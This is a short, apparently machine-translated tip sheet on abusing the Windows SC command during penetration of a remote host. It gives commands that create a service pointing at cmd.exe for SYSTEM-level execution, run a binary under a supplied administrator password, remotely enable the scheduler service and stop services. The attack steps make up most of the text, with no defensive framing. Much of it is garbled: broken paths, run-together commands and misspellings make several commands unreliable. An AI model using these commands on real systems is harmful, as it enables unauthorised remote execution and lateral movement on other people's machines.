See http://technet.microsoft.com/zh-cn/library/cc772676 (WS.10 ). there are three common features of aspx SC in penetration: remotely execute things, remotely enable/disable services, and query service information, such as the service exe path. 1.1 Execute Command (system permission): // for other methods to execute command reference: http://bra.adminsec.com/security/787.html SC \ 10.1.1.1 create winnt binpath = c: \ cmd.exe SC \ 10.1.1.1 start winnt SC \ 10.1.1.1 delete winnt 1.2 run the command (specify user permissions) SC \ 10.1.1.1 create adminsec binpath = "c: \ pass.exe "obj =" adminsec \ administrator "passwrod = adminsecsc \ ip start testsrvname 2. enable/disable the service remotely, such as starting a scheduled task. At execution is better than SC. SC .exe \ 10.1.1.1 config schedule start = auto // note = There is a space behind it. Sometimes it cannot be enabled without anto. SC .exe \ 10.1.1.1 start "schedule" closes a service: SC getkeyname "Task schedle" // gets the service name SC stop "Schedule" other tips, to obtain the path of the execution file of a service. SC qc schedulePS: SC must note the service name and display name. These two are different concepts.